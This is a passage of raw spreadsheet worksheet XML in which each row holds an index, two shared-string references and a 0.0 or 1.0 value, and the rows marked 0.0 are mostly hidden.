        <v>3076</v>
      </c>
      <c r="D1810" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1811" hidden="1">
      <c r="A1811" s="1">
        <v>1809.0</v>
      </c>
      <c r="B1811" s="1" t="s">
        <v>914</v>
      </c>
      <c r="C1811" s="1" t="s">
        <v>3077</v>
      </c>
      <c r="D1811" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1812" hidden="1">
      <c r="A1812" s="1">
        <v>1810.0</v>
      </c>
      <c r="B1812" s="1" t="s">
        <v>3078</v>
      </c>
      <c r="C1812" s="1" t="s">
        <v>3079</v>
      </c>
      <c r="D1812" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1813" hidden="1">
      <c r="A1813" s="1">
        <v>1811.0</v>
      </c>
      <c r="B1813" s="1" t="s">
        <v>3080</v>
      </c>
      <c r="C1813" s="1" t="s">
        <v>3081</v>
      </c>
      <c r="D1813" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1814" hidden="1">
      <c r="A1814" s="1">
        <v>1812.0</v>
      </c>
      <c r="B1814" s="1" t="s">
        <v>3082</v>
      </c>
      <c r="C1814" s="1" t="s">
        <v>3083</v>
      </c>
      <c r="D1814" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1815" hidden="1">
      <c r="A1815" s="1">
        <v>1813.0</v>
      </c>
      <c r="B1815" s="1" t="s">
        <v>3084</v>
      </c>
      <c r="C1815" s="1" t="s">
        <v>3085</v>
      </c>
      <c r="D1815" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1816" hidden="1">
      <c r="A1816" s="1">
        <v>1814.0</v>
      </c>
      <c r="B1816" s="1" t="s">
        <v>93</v>
      </c>
      <c r="C1816" s="1" t="s">
        <v>3086</v>
      </c>
      <c r="D1816" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1817" hidden="1">
      <c r="A1817" s="1">
        <v>1815.0</v>
      </c>
      <c r="B1817" s="1" t="s">
        <v>1165</v>
      </c>
      <c r="C1817" s="1" t="s">
        <v>3087</v>
      </c>
      <c r="D1817" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1818" hidden="1">
      <c r="A1818" s="1">
        <v>1816.0</v>
      </c>
      <c r="B1818" s="1" t="s">
        <v>601</v>
      </c>
      <c r="C1818" s="1" t="s">
        <v>3088</v>
      </c>
      <c r="D1818" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1819" hidden="1">
      <c r="A1819" s="1">
        <v>1817.0</v>
      </c>
      <c r="B1819" s="1" t="s">
        <v>3089</v>
      </c>
      <c r="C1819" s="1" t="s">
        <v>3090</v>
      </c>
      <c r="D1819" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1820" hidden="1">
      <c r="A1820" s="1">
        <v>1818.0</v>
      </c>
      <c r="B1820" s="1" t="s">
        <v>3091</v>
      </c>
      <c r="C1820" s="1" t="s">
        <v>3092</v>
      </c>
      <c r="D1820" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1821" hidden="1">
      <c r="A1821" s="1">
        <v>1819.0</v>
      </c>
      <c r="B1821" s="1" t="s">
        <v>3093</v>
      </c>
      <c r="C1821" s="1" t="s">
        <v>3094</v>
      </c>
      <c r="D1821" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1822" hidden="1">
      <c r="A1822" s="1">
        <v>1820.0</v>
      </c>
      <c r="B1822" s="1" t="s">
        <v>2848</v>
      </c>
      <c r="C1822" s="1" t="s">
        <v>3095</v>
      </c>
      <c r="D1822" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1823" hidden="1">
      <c r="A1823" s="1">
        <v>1821.0</v>
      </c>
      <c r="B1823" s="1" t="s">
        <v>846</v>
      </c>
      <c r="C1823" s="1" t="s">
        <v>847</v>
      </c>
      <c r="D1823" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1824">
      <c r="A1824" s="1">
        <v>1822.0</v>
      </c>
      <c r="B1824" s="1" t="s">
        <v>3096</v>
      </c>
      <c r="C1824" s="1" t="s">
        <v>3097</v>
      </c>
      <c r="D1824" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1825" hidden="1">
      <c r="A1825" s="1">
        <v>1823.0</v>
      </c>
      <c r="B1825" s="1" t="s">
        <v>3098</v>
      </c>
      <c r="C1825" s="1" t="s">
        <v>3099</v>
      </c>
      <c r="D1825" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1826">
      <c r="A1826" s="1">
        <v>1824.0</v>
      </c>
      <c r="B1826" s="1" t="s">
        <v>593</v>
      </c>
      <c r="C1826" s="1" t="s">
        <v>3100</v>
      </c>
      <c r="D1826" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1827" hidden="1">
      <c r="A1827" s="1">
        <v>1825.0</v>
      </c>
      <c r="B1827" s="1" t="s">
        <v>3101</v>
      </c>
      <c r="C1827" s="1" t="s">
        <v>3102</v>
      </c>
      <c r="D1827" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1828" hidden="1">
      <c r="A1828" s="1">
        <v>1826.0</v>
      </c>
      <c r="B1828" s="1" t="s">
        <v>3103</v>
      </c>
      <c r="C1828" s="1" t="s">
        <v>3104</v>
      </c>
      <c r="D1828" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1829" hidden="1">
      <c r="A1829" s="1">
        <v>1827.0</v>
      </c>
      <c r="B1829" s="1" t="s">
        <v>2719</v>
      </c>
      <c r="C1829" s="1" t="s">
        <v>3105</v>
      </c>
      <c r="D1829" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1830" hidden="1">
      <c r="A1830" s="1">
        <v>1828.0</v>
      </c>
      <c r="B1830" s="1" t="s">
        <v>3106</v>
      </c>
      <c r="C1830" s="1" t="s">
        <v>3107</v>
      </c>
      <c r="D1830" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1831" hidden="1">
      <c r="A1831" s="1">
        <v>1829.0</v>
      </c>
      <c r="B1831" s="1" t="s">
        <v>26</v>
      </c>
      <c r="C1831" s="1" t="s">
        <v>3108</v>
      </c>
      <c r="D1831" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1832" hidden="1">
      <c r="A1832" s="1">
        <v>1830.0</v>
      </c>
      <c r="B1832" s="1" t="s">
        <v>313</v>
      </c>
      <c r="C1832" s="1" t="s">
        <v>3109</v>
      </c>
      <c r="D1832" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1833" hidden="1">
      <c r="A1833" s="1">
        <v>1831.0</v>
      </c>
      <c r="B1833" s="1" t="s">
        <v>3091</v>
      </c>
      <c r="C1833" s="1" t="s">
        <v>3110</v>
      </c>
      <c r="D1833" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1834" hidden="1">
      <c r="A1834" s="1">
        <v>1832.0</v>
      </c>
      <c r="B1834" s="1" t="s">
        <v>573</v>
      </c>
      <c r="C1834" s="1" t="s">
        <v>574</v>
      </c>
      <c r="D1834" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1835" hidden="1">
      <c r="A1835" s="1">
        <v>1833.0</v>
      </c>
      <c r="B1835" s="1" t="s">
        <v>3111</v>
      </c>
      <c r="C1835" s="1" t="s">
        <v>3112</v>
      </c>
      <c r="D1835" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1836" hidden="1">
      <c r="A1836" s="1">
        <v>1834.0</v>
      </c>
      <c r="B1836" s="1" t="s">
        <v>3113</v>
      </c>
      <c r="C1836" s="1" t="s">
        <v>3114</v>
      </c>
      <c r="D1836" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1837">
      <c r="A1837" s="1">
        <v>1835.0</v>
      </c>
      <c r="B1837" s="1" t="s">
        <v>3115</v>
      </c>
      <c r="C1837" s="1" t="s">
        <v>3116</v>
      </c>
      <c r="D1837" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1838" hidden="1">
      <c r="A1838" s="1">
        <v>1836.0</v>
      </c>
      <c r="B1838" s="1" t="s">
        <v>3117</v>
      </c>
      <c r="C1838" s="1" t="s">
        <v>3118</v>
      </c>
      <c r="D1838" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1839" hidden="1">
      <c r="A1839" s="1">
        <v>1837.0</v>
      </c>
      <c r="B1839" s="1" t="s">
        <v>3119</v>
      </c>
      <c r="C1839" s="1" t="s">
        <v>3120</v>
      </c>
      <c r="D1839" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1840">
      <c r="A1840" s="1">
        <v>1838.0</v>
      </c>
      <c r="B1840" s="1" t="s">
        <v>3121</v>
      </c>
      <c r="C1840" s="1" t="s">
        <v>3122</v>
      </c>
      <c r="D1840" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1841">
      <c r="A1841" s="1">
        <v>1839.0</v>
      </c>
      <c r="B1841" s="1" t="s">
        <v>3123</v>
      </c>
      <c r="C1841" s="1" t="s">
        <v>3124</v>
      </c>
      <c r="D1841" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1842">
      <c r="A1842" s="1">
        <v>1840.0</v>
      </c>
      <c r="B1842" s="1" t="s">
        <v>3125</v>
      </c>
      <c r="C1842" s="1" t="s">
        <v>3126</v>
      </c>
      <c r="D1842" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1843" hidden="1">
      <c r="A1843" s="1">
        <v>1841.0</v>
      </c>
      <c r="B1843" s="1" t="s">
        <v>3127</v>
      </c>
      <c r="C1843" s="1" t="s">
        <v>3128</v>
      </c>
      <c r="D1843" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1844" hidden="1">
      <c r="A1844" s="1">
        <v>1842.0</v>
      </c>
      <c r="B1844" s="1" t="s">
        <v>3129</v>
      </c>
      <c r="C1844" s="1" t="s">
        <v>3130</v>
      </c>
      <c r="D1844" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1845" hidden="1">
      <c r="A1845" s="1">
        <v>1843.0</v>
      </c>
      <c r="B1845" s="1" t="s">
        <v>3131</v>
      </c>
      <c r="C1845" s="1" t="s">
        <v>3132</v>
      </c>
      <c r="D1845" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1846">
      <c r="A1846" s="1">
        <v>1844.0</v>
      </c>
      <c r="B1846" s="1" t="s">
        <v>3133</v>
      </c>
      <c r="C1846" s="1" t="s">
        <v>3134</v>
      </c>
      <c r="D1846" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1847">
      <c r="A1847" s="1">
        <v>1845.0</v>
      </c>
      <c r="B1847" s="1" t="s">
        <v>3135</v>
      </c>
      <c r="C1847" s="1" t="s">
        <v>3136</v>
      </c>
      <c r="D1847" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1848">
      <c r="A1848" s="1">
        <v>1846.0</v>
      </c>
      <c r="B1848" s="1" t="s">
        <v>1597</v>
      </c>
      <c r="C1848" s="1" t="s">
        <v>1598</v>
      </c>
      <c r="D1848" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1849" hidden="1">
      <c r="A1849" s="1">
        <v>1847.0</v>
      </c>
      <c r="B1849" s="1" t="s">
        <v>3137</v>
      </c>
      <c r="C1849" s="1" t="s">
        <v>3138</v>
      </c>
      <c r="D1849" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1850" hidden="1">
      <c r="A1850" s="1">
        <v>1848.0</v>
      </c>
      <c r="B1850" s="1" t="s">
        <v>786</v>
      </c>
      <c r="C1850" s="1" t="s">
        <v>3139</v>
      </c>
      <c r="D1850" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1851" hidden="1">
      <c r="A1851" s="1">
        <v>1849.0</v>
      </c>
      <c r="B1851" s="1" t="s">
        <v>2009</v>
      </c>
      <c r="C1851" s="1" t="s">
        <v>2010</v>
      </c>
      <c r="D1851" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1852" hidden="1">
      <c r="A1852" s="1">
        <v>1850.0</v>
      </c>
      <c r="B1852" s="1" t="s">
        <v>1827</v>
      </c>
      <c r="C1852" s="1" t="s">
        <v>3140</v>
      </c>
      <c r="D1852" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1853" hidden="1">
      <c r="A1853" s="1">
        <v>1851.0</v>
      </c>
      <c r="B1853" s="1" t="s">
        <v>3141</v>
      </c>
      <c r="C1853" s="1" t="s">
        <v>3142</v>
      </c>
      <c r="D1853" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1854" hidden="1">
      <c r="A1854" s="1">
        <v>1852.0</v>
      </c>
      <c r="B1854" s="1" t="s">
        <v>1102</v>
      </c>
      <c r="C1854" s="1" t="s">
        <v>3143</v>
      </c>
      <c r="D1854" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1855" hidden="1">
      <c r="A1855" s="1">
        <v>1853.0</v>
      </c>
      <c r="B1855" s="1" t="s">
        <v>3144</v>
      </c>
      <c r="C1855" s="1" t="s">
        <v>3145</v>
      </c>
      <c r="D1855" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1856" hidden="1">
      <c r="A1856" s="1">
        <v>1854.0</v>
      </c>
      <c r="B1856" s="1" t="s">
        <v>1120</v>
      </c>
      <c r="C1856" s="1" t="s">
        <v>3146</v>
      </c>
      <c r="D1856" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1857" hidden="1">
      <c r="A1857" s="1">
        <v>1855.0</v>
      </c>
      <c r="B1857" s="1" t="s">
        <v>2994</v>
      </c>
      <c r="C1857" s="1" t="s">
        <v>3147</v>
      </c>
      <c r="D1857" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1858" hidden="1">
      <c r="A1858" s="1">
        <v>1856.0</v>
      </c>
      <c r="B1858" s="1" t="s">
        <v>3148</v>
      </c>
      <c r="C1858" s="1" t="s">
        <v>3149</v>
      </c>
      <c r="D1858" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1859" hidden="1">
      <c r="A1859" s="1">
        <v>1857.0</v>
      </c>
      <c r="B1859" s="1" t="s">
        <v>3150</v>
      </c>
      <c r="C1859" s="1" t="s">
        <v>3151</v>
      </c>
      <c r="D1859" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1860" hidden="1">
      <c r="A1860" s="1">
        <v>1858.0</v>
      </c>
      <c r="B1860" s="1" t="s">
        <v>1797</v>
      </c>
      <c r="C1860" s="1" t="s">
        <v>3152</v>
      </c>
      <c r="D1860" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1861" hidden="1">
      <c r="A1861" s="1">
        <v>1859.0</v>
      </c>
      <c r="B1861" s="1" t="s">
        <v>1717</v>
      </c>
      <c r="C1861" s="1" t="s">
        <v>3153</v>
      </c>
      <c r="D1861" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1862" hidden="1">
      <c r="A1862" s="1">
        <v>1860.0</v>
      </c>
      <c r="B1862" s="1" t="s">
        <v>3154</v>
      </c>
      <c r="C1862" s="1" t="s">
        <v>3155</v>
      </c>
      <c r="D1862" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1863" hidden="1">
      <c r="A1863" s="1">
        <v>1861.0</v>
      </c>
      <c r="B1863" s="1" t="s">
        <v>3156</v>
      </c>
      <c r="C1863" s="1" t="s">
        <v>3157</v>
      </c>
      <c r="D1863" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1864" hidden="1">
      <c r="A1864" s="1">
        <v>1862.0</v>
      </c>
      <c r="B1864" s="1" t="s">
        <v>2360</v>
      </c>
      <c r="C1864" s="1" t="s">
        <v>3158</v>
      </c>
      <c r="D1864" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1865" hidden="1">
      <c r="A1865" s="1">
        <v>1863.0</v>
      </c>
      <c r="B1865" s="1" t="s">
        <v>3159</v>
      </c>
      <c r="C1865" s="1" t="s">
        <v>3160</v>
      </c>
      <c r="D1865" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1866">
      <c r="A1866" s="1">
        <v>1864.0</v>
      </c>
      <c r="B1866" s="1" t="s">
        <v>3161</v>
      </c>
      <c r="C1866" s="1" t="s">
        <v>3162</v>
      </c>
      <c r="D1866" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1867" hidden="1">
      <c r="A1867" s="1">
        <v>1865.0</v>
      </c>
      <c r="B1867" s="1" t="s">
        <v>3163</v>
      </c>
      <c r="C1867" s="1" t="s">
        <v>3164</v>
      </c>
      <c r="D1867" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1868" hidden="1">
      <c r="A1868" s="1">
        <v>1866.0</v>
      </c>
      <c r="B1868" s="1" t="s">
        <v>3165</v>
      </c>
      <c r="C1868" s="1" t="s">
        <v>3166</v>
      </c>
      <c r="D1868" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1869" hidden="1">
      <c r="A1869" s="1">
        <v>1867.0</v>
      </c>
      <c r="B1869" s="1" t="s">
        <v>2257</v>
      </c>
      <c r="C1869" s="1" t="s">
        <v>3167</v>
      </c>
      <c r="D1869" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1870" hidden="1">
      <c r="A1870" s="1">
        <v>1868.0</v>
      </c>
      <c r="B1870" s="1" t="s">
        <v>1684</v>
      </c>
      <c r="C1870" s="1" t="s">
        <v>3168</v>
      </c>
      <c r="D1870" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1871" hidden="1">
      <c r="A1871" s="1">
        <v>1869.0</v>
      </c>
      <c r="B1871" s="1" t="s">
        <v>56</v>
      </c>
      <c r="C1871" s="1" t="s">
        <v>2861</v>
      </c>
      <c r="D1871" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1872" hidden="1">
      <c r="A1872" s="1">
        <v>1870.0</v>
      </c>
      <c r="B1872" s="1" t="s">
        <v>3169</v>
      </c>
      <c r="C1872" s="1" t="s">
        <v>3170</v>
      </c>
      <c r="D1872" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1873" hidden="1">
      <c r="A1873" s="1">
        <v>1871.0</v>
      </c>
      <c r="B1873" s="1" t="s">
        <v>3171</v>
      </c>
      <c r="C1873" s="1" t="s">
        <v>3172</v>
      </c>
      <c r="D1873" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1874">
      <c r="A1874" s="1">
        <v>1872.0</v>
      </c>
      <c r="B1874" s="1" t="s">
        <v>3173</v>
      </c>
      <c r="C1874" s="1" t="s">
        <v>3174</v>
      </c>
      <c r="D1874" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1875" hidden="1">
      <c r="A1875" s="1">
        <v>1873.0</v>
      </c>
      <c r="B1875" s="1" t="s">
        <v>1787</v>
      </c>
      <c r="C1875" s="1" t="s">
        <v>1788</v>
      </c>
      <c r="D1875" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1876">
      <c r="A1876" s="1">
        <v>1874.0</v>
      </c>
      <c r="B1876" s="1" t="s">
        <v>3175</v>
      </c>
      <c r="C1876" s="1" t="s">
        <v>3176</v>
      </c>
      <c r="D1876" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1877">
      <c r="A1877" s="1">
        <v>1875.0</v>
      </c>
      <c r="B1877" s="1" t="s">
        <v>3177</v>
      </c>
      <c r="C1877" s="1" t="s">
        <v>3178</v>
      </c>
      <c r="D1877" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1878">
      <c r="A1878" s="1">
        <v>1876.0</v>
      </c>
      <c r="B1878" s="1" t="s">
        <v>3179</v>
      </c>
      <c r="C1878" s="1" t="s">
        <v>3180</v>
      </c>
      <c r="D1878" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1879">
      <c r="A1879" s="1">
        <v>1877.0</v>
      </c>
      <c r="B1879" s="1" t="s">
        <v>3181</v>
      </c>
      <c r="C1879" s="1" t="s">
        <v>3182</v>
      </c>
      <c r="D1879" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1880">
      <c r="A1880" s="1">
        <v>1878.0</v>
      </c>
      <c r="B1880" s="1" t="s">
        <v>3183</v>
      </c>
      <c r="C1880" s="1" t="s">
        <v>3184</v>
      </c>
      <c r="D1880" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1881" hidden="1">
      <c r="A1881" s="1">
        <v>1879.0</v>
      </c>
      <c r="B1881" s="1" t="s">
        <v>3185</v>
      </c>
      <c r="C1881" s="1" t="s">
        <v>3186</v>
      </c>
      <c r="D1881" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1882">
      <c r="A1882" s="1">
        <v>1880.0</v>
      </c>
      <c r="B1882" s="1" t="s">
        <v>3187</v>
      </c>
      <c r="C1882" s="1" t="s">
        <v>3188</v>
      </c>
      <c r="D1882" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1883" hidden="1">
      <c r="A1883" s="1">
        <v>1881.0</v>
      </c>
      <c r="B1883" s="1" t="s">
        <v>1163</v>
      </c>
      <c r="C1883" s="1" t="s">
        <v>2252</v>
      </c>
      <c r="D1883" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1884">
      <c r="A1884" s="1">
        <v>1882.0</v>
      </c>
      <c r="B1884" s="1" t="s">
        <v>3189</v>
      </c>
      <c r="C1884" s="1" t="s">
        <v>3190</v>
      </c>
      <c r="D1884" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1885" hidden="1">
      <c r="A1885" s="1">
        <v>1883.0</v>
      </c>
      <c r="B1885" s="1" t="s">
        <v>3191</v>
      </c>
      <c r="C1885" s="1" t="s">
        <v>3192</v>
      </c>
      <c r="D1885" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1886" hidden="1">
      <c r="A1886" s="1">
        <v>1884.0</v>
      </c>
      <c r="B1886" s="1" t="s">
        <v>2679</v>
      </c>
      <c r="C1886" s="1" t="s">
        <v>3193</v>
      </c>
      <c r="D1886" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1887" hidden="1">
      <c r="A1887" s="1">
        <v>1885.0</v>
      </c>
      <c r="B1887" s="1" t="s">
        <v>3194</v>
      </c>
      <c r="C1887" s="1" t="s">
        <v>3195</v>
      </c>
      <c r="D1887" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1888" hidden="1">
      <c r="A1888" s="1">
        <v>1886.0</v>
      </c>
      <c r="B1888" s="1" t="s">
        <v>3196</v>
      </c>
      <c r="C1888" s="1" t="s">
        <v>3197</v>
      </c>
      <c r="D1888" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1889" hidden="1">
      <c r="A1889" s="1">
        <v>1887.0</v>
      </c>
      <c r="B1889" s="1" t="s">
        <v>914</v>
      </c>
      <c r="C1889" s="1" t="s">
        <v>3198</v>
      </c>
      <c r="D1889" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1890" hidden="1">
      <c r="A1890" s="1">
        <v>1888.0</v>
      </c>
      <c r="B1890" s="1" t="s">
        <v>1278</v>
      </c>
      <c r="C1890" s="1" t="s">
        <v>1279</v>
      </c>
      <c r="D1890" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1891" hidden="1">
      <c r="A1891" s="1">
        <v>1889.0</v>
      </c>
      <c r="B1891" s="1" t="s">
        <v>3199</v>
      </c>
      <c r="C1891" s="1" t="s">
        <v>3200</v>
      </c>
      <c r="D1891" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1892">
      <c r="A1892" s="1">
        <v>1890.0</v>
      </c>
      <c r="B1892" s="1" t="s">
        <v>3201</v>
      </c>
      <c r="C1892" s="1" t="s">
        <v>3202</v>
      </c>
      <c r="D1892" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1893" hidden="1">
      <c r="A1893" s="1">
        <v>1891.0</v>
      </c>
      <c r="B1893" s="1" t="s">
        <v>3203</v>
      </c>
      <c r="C1893" s="1" t="s">
        <v>3204</v>
      </c>
      <c r="D1893" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1894">
      <c r="A1894" s="1">
        <v>1892.0</v>
      </c>
      <c r="B1894" s="1" t="s">
        <v>3205</v>
      </c>
      <c r="C1894" s="1" t="s">
        <v>3206</v>
      </c>
      <c r="D1894" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1895">
      <c r="A1895" s="1">
        <v>1893.0</v>
      </c>
      <c r="B1895" s="1" t="s">
        <v>3207</v>
      </c>
      <c r="C1895" s="1" t="s">
        <v>806</v>
      </c>
      <c r="D1895" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1896">
      <c r="A1896" s="1">
        <v>1894.0</v>
      </c>
      <c r="B1896" s="1" t="s">
        <v>3208</v>
      </c>
      <c r="C1896" s="1" t="s">
        <v>3209</v>
      </c>
      <c r="D1896" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1897" hidden="1">
      <c r="A1897" s="1">
        <v>1895.0</v>
      </c>
      <c r="B1897" s="1" t="s">
        <v>486</v>
      </c>
      <c r="C1897" s="1" t="s">
        <v>3210</v>
      </c>
      <c r="D1897" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1898" hidden="1">
      <c r="A1898" s="1">
        <v>1896.0</v>
      </c>
      <c r="B1898" s="1" t="s">
        <v>323</v>
      </c>
      <c r="C1898" s="1" t="s">
        <v>3211</v>
      </c>
      <c r="D1898" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1899" hidden="1">
      <c r="A1899" s="1">
        <v>1897.0</v>
      </c>
      <c r="B1899" s="1" t="s">
        <v>2994</v>
      </c>
      <c r="C1899" s="1" t="s">
        <v>2995</v>
      </c>
      <c r="D1899" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1900">
      <c r="A1900" s="1">
        <v>1898.0</v>
      </c>
      <c r="B1900" s="1" t="s">
        <v>245</v>
      </c>
      <c r="C1900" s="1" t="s">
        <v>246</v>
      </c>
      <c r="D1900" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1901" hidden="1">
      <c r="A1901" s="1">
        <v>1899.0</v>
      </c>
      <c r="B1901" s="1" t="s">
        <v>3212</v>
      </c>
      <c r="C1901" s="1" t="s">
        <v>3213</v>
      </c>
      <c r="D1901" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1902" hidden="1">
      <c r="A1902" s="1">
        <v>1900.0</v>
      </c>
      <c r="B1902" s="1" t="s">
        <v>3214</v>
      </c>
      <c r="C1902" s="1" t="s">
        <v>3215</v>
      </c>
      <c r="D1902" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1903" hidden="1">
      <c r="A1903" s="1">
        <v>1901.0</v>
      </c>
      <c r="B1903" s="1" t="s">
        <v>1165</v>
      </c>
      <c r="C1903" s="1" t="s">
        <v>3216</v>
      </c>
      <c r="D1903" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1904" hidden="1">
      <c r="A1904" s="1">
        <v>1902.0</v>
      </c>
      <c r="B1904" s="1" t="s">
        <v>3217</v>
      </c>
      <c r="C1904" s="1" t="s">
        <v>3218</v>
      </c>
      <c r="D1904" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1905" hidden="1">
      <c r="A1905" s="1">
        <v>1903.0</v>
      </c>
      <c r="B1905" s="1" t="s">
        <v>3219</v>
      </c>
      <c r="C1905" s="1" t="s">
        <v>3220</v>
      </c>
      <c r="D1905" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1906" hidden="1">
      <c r="A1906" s="1">
        <v>1904.0</v>
      </c>
      <c r="B1906" s="1" t="s">
        <v>3221</v>
      </c>
      <c r="C1906" s="1" t="s">
        <v>3222</v>
      </c>
      <c r="D1906" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1907">
      <c r="A1907" s="1">
        <v>1905.0</v>
      </c>
      <c r="B1907" s="1" t="s">
        <v>3223</v>
      </c>
      <c r="C1907" s="1" t="s">
        <v>3224</v>
      </c>
      <c r="D1907" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1908" hidden="1">
      <c r="A1908" s="1">
        <v>1906.0</v>
      </c>
      <c r="B1908" s="1" t="s">
        <v>3225</v>
      </c>
      <c r="C1908" s="1" t="s">
        <v>3226</v>
      </c>
      <c r="D1908" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1909" hidden="1">
      <c r="A1909" s="1">
        <v>1907.0</v>
      </c>
      <c r="B1909" s="1" t="s">
        <v>3227</v>
      </c>
      <c r="C1909" s="1" t="s">
        <v>3228</v>
      </c>
      <c r="D1909" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1910" hidden="1">
      <c r="A1910" s="1">
        <v>1908.0</v>
      </c>
      <c r="B1910" s="1" t="s">
        <v>3229</v>
      </c>
      <c r="C1910" s="1" t="s">
        <v>3230</v>
      </c>
      <c r="D1910" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1911" hidden="1">
      <c r="A1911" s="1">
        <v>1909.0</v>
      </c>
      <c r="B1911" s="1" t="s">
        <v>3231</v>
      </c>
      <c r="C1911" s="1" t="s">
        <v>3232</v>
      </c>
      <c r="D1911" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1912" hidden="1">
      <c r="A1912" s="1">
        <v>1910.0</v>
      </c>
      <c r="B1912" s="1" t="s">
        <v>3233</v>
      </c>
      <c r="C1912" s="1" t="s">
        <v>3234</v>
      </c>
      <c r="D1912" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1913" hidden="1">
      <c r="A1913" s="1">
        <v>1911.0</v>
      </c>
      <c r="B1913" s="1" t="s">
        <v>1649</v>
      </c>
      <c r="C1913" s="1" t="s">
        <v>1650</v>
      </c>
